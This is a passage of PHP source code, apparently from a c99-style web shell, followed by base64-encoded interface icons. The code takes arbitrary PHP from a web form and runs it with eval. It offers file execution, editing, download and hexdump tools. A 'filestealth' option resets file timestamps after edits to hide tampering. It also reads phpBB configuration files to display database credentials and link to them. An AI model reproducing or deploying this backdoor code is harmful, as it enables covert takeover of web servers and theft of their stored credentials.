2507 while (ereg("=",$ret)) { $ret = str_replace("=","",$ret); }
2508 $ret = convert_cyr_string($ret,"d","w");
2509 $stack = explode("\n",$ret);
2510 unset($stack[0],$stack[2]);
2511 $stack = array_values($stack);
2512 $stack[0]=str_replace("Image Name","ImageName",$stack[0]);
2513 $stack[0]=str_replace("Session Name","SessionName",$stack[0]);
2514 $stack[0]=str_replace("Mem Usage","MemoryUsage",$stack[0]);
2515 $head = explode(" ",$stack[0]);
2516 $stack = array_slice($stack,1);
2517 $head = array_values($head);
2518 if ($parsesort[1] != "a") { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; }
2519 else { $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; }
2520 if ($k > count($head)) {$k = count($head)-1;}
2521 for($i=0;$i<count($head);$i++) {
2522 if ($i != $k) { $head[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&processes_sort=".$i.$parsesort[1]."\"><b>".trim($head[$i])."</b></a>"; }
2523 }
2524 $prcs = array();
2525 unset($stack[0]);
2526 foreach ($stack as $line) {
2527 if (!empty($line)) {
2528 $line = explode(" ",$line);
2529 $line[4] = str_replace(".","",$line[4]);
2530 $line[4] = intval($line[4]) * 1024;
2531 unset($line[5]);
2532 $prcs[] = $line;
2533 }
2534 }
2535 }
2536 $head[$k] = "<b>".$head[$k]."</b>".$y;
2537 $v = $processes_sort[0];
2538 usort($prcs,"tabsort");
2539 if ($processes_sort[1] == "d") { $prcs = array_reverse($prcs); }
2540 $tab = array();
2541 $tab[] = $head;
2542 $tab = array_merge($tab,$prcs);
2543 echo "<table class=explorer>\n";
2544 foreach($tab as $i=>$k) {
2545 echo "<tr>";
2546 foreach($k as $j=>$v) {
2547 if ($win and $i > 0 and $j == 4) { $v = view_size($v); }
2548 echo "<td>".$v."</td>";
2549 }
2550 echo "</tr>\n";
2551 }
2552 echo "</table>";
2553 }
2554 }
2555 if ($act == "eval") {
2556 echo "<p><b>.: Eval :.</b></p><br>";
2557 if (!empty($eval)) {
2558 echo "Result of execution this PHP-code:<br>";
2559 $tmp = @ob_get_contents();
2560 $olddir = realpath(".");
2561 @chdir($d);
2562 if ($tmp) {
2563 @ob_clean();
2564 eval($eval);
2565 $ret = @ob_get_contents();
2566 $ret = convert_cyr_string($ret,"d","w");
2567 @ob_clean();
2568 echo $tmp;
2569 if ($eval_txt) {
2570 $rows = count(explode("\r\n",$ret))+1;
2571 if ($rows < 10) {$rows = 10;}
2572 echo "<br><textarea cols=\"115\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
2573 }
2574 else {echo $ret."<br>";}
2575 }
2576 else {
2577 if ($eval_txt) {
2578 echo "<br><textarea cols=\"115\" rows=\"15\" readonly>";
2579 eval($eval);
2580 echo "</textarea>";
2581 }
2582 else {echo $ret;}
2583 }
2584 @chdir($olddir);
2585 }
2586 else {echo "<b>PHP-code Execution (Use without PHP Braces!)</b>"; if (empty($eval_txt)) {$eval_txt = TRUE;}}
2587 echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=eval><textarea name=\"eval\" cols=\"115\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>";
2588 }
2589 if ($act == "f") {
2590 echo "<div align=left>";
2591 if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") {
2592 if (file_exists($d.$f)) {echo "<center><b>Permision denied (".htmlspecialchars($d.$f).")!</b></center>";}
2593 else {echo "<center><b>File does not exists (".htmlspecialchars($d.$f).")!</b><br><a href=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."&c=1\"><u>Create</u></a></center>";}
2594 }
2595 else {
2596 $r = @file_get_contents($d.$f);
2597 $ext = explode(".",$f);
2598 $c = count($ext)-1;
2599 $ext = $ext[$c];
2600 $ext = strtolower($ext);
2601 $rft = "";
2602 foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}}
2603 if (eregi("sess_(.*)",$f)) {$rft = "phpsess";}
2604 if (empty($ft)) {$ft = $rft;}
2605 $arr = array(
2606 array("<img src=\"".$surl."act=img&img=ext_diz\" border=\"0\">","info"),
2607 array("<img src=\"".$surl."act=img&img=ext_html\" border=\"0\">","html"),
2608 array("<img src=\"".$surl."act=img&img=ext_txt\" border=\"0\">","txt"),
2609 array("Code","code"),
2610 array("Session","phpsess"),
2611 array("<img src=\"".$surl."act=img&img=ext_exe\" border=\"0\">","exe"),
2612 array("SDB","sdb"),
2613 array("<img src=\"".$surl."act=img&img=ext_gif\" border=\"0\">","img"),
2614 array("<img src=\"".$surl."act=img&img=ext_ini\" border=\"0\">","ini"),
2615 array("<img src=\"".$surl."act=img&img=download\" border=\"0\">","download"),
2616 array("<img src=\"".$surl."act=img&img=ext_rtf\" border=\"0\">","notepad"),
2617 array("<img src=\"".$surl."act=img&img=change\" border=\"0\">","edit")
2618 );
2619 echo "<b>Viewing file: <img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> ".$f." (".view_size(filesize($d.$f)).") ".view_perms_color($d.$f)."</b><br>Select action/file-type:<br>";
2620 foreach($arr as $t) {
2621 if ($t[1] == $rft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><font color=green>".$t[0]."</font></a>";}
2622 elseif ($t[1] == $ft) {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b><u>".$t[0]."</u></b></a>";}
2623 else {echo " <a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&d=".urlencode($d)."\"><b>".$t[0]."</b></a>";}
2624 echo " (<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=".$t[1]."&white=1&d=".urlencode($d)."\" target=\"_blank\">+</a>) |";
2625 }
2626 echo "<hr size=\"1\" noshade>";
2627 if ($ft == "info") {
2628 echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> ".$d.$f."</td></tr><tr><td><b>Size</b></td><td> ".view_size(filesize($d.$f))."</td></tr><tr><td><b>MD5</b></td><td> ".md5_file($d.$f)."</td></tr>";
2629 if (!$win) {
2630 echo "<tr><td><b>Owner/Group</b></td><td> ";
2631 $ow = posix_getpwuid(fileowner($d.$f));
2632 $gr = posix_getgrgid(filegroup($d.$f));
2633 echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f));
2634 }
2635 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&f=".urlencode($f)."&d=".urlencode($d)."\">".view_perms_color($d.$f)."</a></td></tr><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d.$f))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d.$f))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d.$f))."</td></tr></table>";
2636 $fi = fopen($d.$f,"rb");
2637 if ($fi) {
2638 if ($fullhexdump) {echo "<b>FULL HEXDUMP</b>"; $str = fread($fi,filesize($d.$f));}
2639 else {echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi,$hexdump_lines*$hexdump_rows);}
2640 $n = 0;
2641 $a0 = "00000000<br>";
2642 $a1 = "";
2643 $a2 = "";
2644 for ($i=0; $i<strlen($str); $i++) {
2645 $a1 .= sprintf("%02X",ord($str[$i]))." ";
2646 switch (ord($str[$i])) {
2647 case 0: $a2 .= "<font>0</font>"; break;
2648 case 32:
2649 case 10:
2650 case 13: $a2 .= " "; break;
2651 default: $a2 .= htmlspecialchars($str[$i]);
2652 }
2653 $n++;
2654 if ($n == $hexdump_rows) {
2655 $n = 0;
2656 if ($i+1 < strlen($str)) {$a0 .= sprintf("%08X",$i+1)."<br>";}
2657 $a1 .= "<br>";
2658 $a2 .= "<br>";
2659 }
2660 }
2661 echo "<table border=1 bgcolor=#666666>".
2662 "<tr><td bgcolor=#666666>".$a0."</td>".
2663 "<td bgcolor=#000000>".$a1."</td>".
2664 "<td bgcolor=#000000>".$a2."</td>".
2665 "</tr></table><br>";
2666 }
2667 $encoded = "";
2668 if ($base64 == 1) {
2669 echo "<b>Base64 Encode</b><br>";
2670 $encoded = base64_encode(file_get_contents($d.$f));
2671 }
2672 elseif($base64 == 2) {
2673 echo "<b>Base64 Encode + Chunk</b><br>";
2674 $encoded = chunk_split(base64_encode(file_get_contents($d.$f)));
2675 }
2676 elseif($base64 == 3) {
2677 echo "<b>Base64 Encode + Chunk + Quotes</b><br>";
2678 $encoded = base64_encode(file_get_contents($d.$f));
2679 $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2);
2680 }
2681 elseif($base64 == 4) {
2682 $text = file_get_contents($d.$f);
2683 $encoded = base64_decode($text);
2684 echo "<b>Base64 Decode";
2685 if (base64_encode($encoded) != $text) {echo " (failed)";}
2686 echo "</b><br>";
2687 }
2688 if (!empty($encoded))
2689 {
2690 echo "<textarea cols=80 rows=10>".htmlspecialchars($encoded)."</textarea><br><br>";
2691 }
2692 echo "<b>HEXDUMP:</b><nobr> [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&fullhexdump=1&d=".urlencode($d)."\">Full</a>] [<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&d=".urlencode($d)."\">Preview</a>]<br><b>Base64: </b>
2693 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=1&d=".urlencode($d)."\">Encode</a>] </nobr>
2694 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=2&d=".urlencode($d)."\">+chunk</a>] </nobr>
2695 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=3&d=".urlencode($d)."\">+chunk+quotes</a>] </nobr>
2696 <nobr>[<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=info&base64=4&d=".urlencode($d)."\">Decode</a>] </nobr>
2697 <P>";
2698 }
2699 elseif ($ft == "html") {
2700 if ($white) {@ob_clean();}
2701 echo $r;
2702 if ($white) {cih99exit();}
2703 }
2704 elseif ($ft == "txt") {echo "<pre>".htmlspecialchars($r)."</pre>";}
2705 elseif ($ft == "ini") {echo "<pre>"; var_dump(parse_ini_file($d.$f,TRUE)); echo "</pre>";}
2706 elseif ($ft == "phpsess") {
2707 echo "<pre>";
2708 $v = explode("|",$r);
2709 echo $v[0]."<br>";
2710 var_dump(unserialize($v[1]));
2711 echo "</pre>";
2712 }
2713 elseif ($ft == "exe") {
2714 $ext = explode(".",$f);
2715 $c = count($ext)-1;
2716 $ext = $ext[$c];
2717 $ext = strtolower($ext);
2718 $rft = "";
2719 foreach($exeftypes as $k=>$v)
2720 {
2721 if (in_array($ext,$v)) {$rft = $k; break;}
2722 }
2723 $cmd = str_replace("%f%",$f,$rft);
2724 echo "<b>Execute file:</b><form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><input type=\"text\" name=\"cmd\" value=\"".htmlspecialchars($cmd)."\" size=\"".(strlen($cmd)+2)."\"><br>Display in text-area<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\" checked><input type=hidden name=\"d\" value=\"".htmlspecialchars($d)."\"><br><input type=submit name=submit value=\"Execute\"></form>";
2725 }
2726 elseif ($ft == "sdb") {echo "<pre>"; var_dump(unserialize(base64_decode($r))); echo "</pre>";}
2727 elseif ($ft == "code") {
2728 if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) {
2729 $arr = explode("\n",$r);
2730 if (count($arr == 18)) {
2731 include($d.$f);
2732 echo "<b>phpBB configuration is detected in this file!<br>";
2733 if ($dbms == "mysql4") {$dbms = "mysql";}
2734 if ($dbms == "mysql") {echo "<a href=\"".$surl."act=sql&sql_server=".htmlspecialchars($dbhost)."&sql_login=".htmlspecialchars($dbuser)."&sql_passwd=".htmlspecialchars($dbpasswd)."&sql_port=3306&sql_db=".htmlspecialchars($dbname)."\"><b><u>Connect to DB</u></b></a><br><br>";}
2735 else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by ".$ch_name.". Please, report us for fix.";}
2736 echo "Parameters for manual connect:<br>";
2737 $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd);
2738 foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'<br>";}
2739 echo "</b><hr size=\"1\" noshade>";
2740 }
2741 }
2742 echo "<div style=\"border : 0px solid #FFFFFF; padding: 1em; margin-top: 1em; margin-bottom: 1em; margin-right: 1em; margin-left: 1em; background-color: ".$highlight_background .";\">";
2743 if (!empty($white)) {@ob_clean();}
2744 highlight_file($d.$f);
2745 if (!empty($white)) {cih99exit();}
2746 echo "</div>";
2747 }
2748 elseif ($ft == "download") {
2749 @ob_clean();
2750 header("Content-type: application/octet-stream");
2751 header("Content-length: ".filesize($d.$f));
2752 header("Content-disposition: attachment; filename=\"".$f."\";");
2753 echo $r;
2754 exit;
2755 }
2756 elseif ($ft == "notepad") {
2757 @ob_clean();
2758 header("Content-type: text/plain");
2759 header("Content-disposition: attachment; filename=\"".$f.".txt\";");
2760 echo($r);
2761 exit;
2762 }
2763 elseif ($ft == "img") {
2764 $inf = getimagesize($d.$f);
2765 if (!$white) {
2766 if (empty($imgsize)) {$imgsize = 20;}
2767 $width = $inf[0]/100*$imgsize;
2768 $height = $inf[1]/100*$imgsize;
2769 echo "<center><b>Size:</b> ";
2770 $sizes = array("100","50","20");
2771 foreach ($sizes as $v) {
2772 echo "<a href=\"".$surl."act=f&f=".urlencode($f)."&ft=img&d=".urlencode($d)."&imgsize=".$v."\">";
2773 if ($imgsize != $v ) {echo $v;}
2774 else {echo "<u>".$v."</u>";}
2775 echo "</a> ";
2776 }
2777 echo "<br><br><img src=\"".$surl."act=f&f=".urlencode($f)."&ft=img&white=1&d=".urlencode($d)."\" width=\"".$width."\" height=\"".$height."\" border=\"1\"></center>";
2778 }
2779 else {
2780 @ob_clean();
2781 $ext = explode($f,".");
2782 $ext = $ext[count($ext)-1];
2783 header("Content-type: ".$inf["mime"]);
2784 readfile($d.$f);
2785 exit;
2786 }
2787 }
2788 elseif ($ft == "edit") {
2789 if (!empty($submit))
2790 {
2791 if ($filestealth) {$stat = stat($d.$f);}
2792 $fp = fopen($d.$f,"w");
2793 if (!$fp) {echo "<b>Can't write to file!</b>";}
2794 else
2795 {
2796 echo "<b>Saved!</b>";
2797 fwrite($fp,$edit_text);
2798 fclose($fp);
2799 if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);}
2800 $r = $edit_text;
2801 }
2802 }
2803 $rows = count(explode("\r\n",$r));
2804 if ($rows < 10) {$rows = 10;}
2805 if ($rows > 30) {$rows = 30;}
2806 echo "<form action=\"".$surl."act=f&f=".urlencode($f)."&ft=edit&d=".urlencode($d)."\" method=POST><input type=submit name=submit value=\"Save\"> <input type=\"reset\" value=\"Reset\"> <input type=\"button\" onclick=\"location.href='".addslashes($surl."act=ls&d=".substr($d,0,-1))."';\" value=\"Back\"><br><textarea name=\"edit_text\" cols=\"122\" rows=\"".$rows."\">".htmlspecialchars($r)."</textarea></form>";
2807 }
2808 elseif (!empty($ft)) {echo "<center><b>Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.</b></center>";}
2809 else {echo "<center><b>Unknown file type (".$ext."), please select type manually.</b></center>";}
2810 }
2811 echo "</div>\n";
2812 }
2813}
2814else {
2815 @ob_clean();
2816 $images = array(
2817 "arrow_ltr"=>
2818 "R0lGODlhJgAWAIABAP///wAAACH5BAHoAwEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".
2819 "SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",
2820 "back"=>
2821 "R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2822 "aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".
2823 "Wg0JADs=",
2824 "buffer"=>
2825 "R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".
2826 "eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".
2827 "Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",
2828 "change"=>
2829 "R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".
2830 "/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".
2831 "AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".
2832 "wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".
2833 "CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".
2834 "zMshADs=",
2835 "delete"=>
2836 "R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".
2837 "6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".
2838 "sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".
2839 "vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".
2840 "ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".
2841 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2842 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".
2843 "BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".
2844 "STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".
2845 "BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".
2846 "jwVFHBgiEGQFIgQasYkcSbJQIAA7",
2847 "download"=>
2848 "R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
2849 "AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
2850 "EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
2851 "forward"=>
2852 "R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".
2853 "aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".
2854 "WqsJADs=",
2855 "home"=>
2856 "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".
2857 "AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".
2858 "krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".
2859 "VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",
2860 "mode"=>
2861 "R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".
2862 "AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".
2863 "2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".
2864 "dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",
2865 "search"=>
2866 "R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".
2867 "/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".
2868 "s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".
2869 "AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".
2870 "Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",
2871 "setup"=>
2872 "R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".
2873 "QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".
2874 "ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".
2875 "qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".
2876 "OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",
2877 "small_dir"=>
2878 "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
2879 "AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
2880 "/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
2881 "small_unk"=>
2882 "R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".
2883 "p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".
2884 "/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".
2885 "/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".
2886 "/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".
2887 "wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".
2888 "9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".
2889 "66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".
2890 "24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2891 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2892 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2893 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2894 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2895 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2896 "AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".
2897 "aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".
2898 "uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".
2899 "yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".
2900 "yAsokBkQADs=",
2901 "multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".
2902 "pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",
2903 "sort_asc"=>
2904 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".
2905 "SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",
2906 "sort_desc"=>
2907 "R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".
2908 "SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",
2909 "sql_button_drop"=>
2910 "R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
2911 "/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".
2912 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".
2913 "AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".
2914 "MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".
2915 "ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".
2916 "mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".
2917 "zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".
2918 "/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".
2919 "AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".
2920 "M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".
2921 "ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".
2922 "mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".
2923 "zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".
2924 "AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".
2925 "AQEAOw==",
2926 "sql_button_empty"=>
2927 "R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".
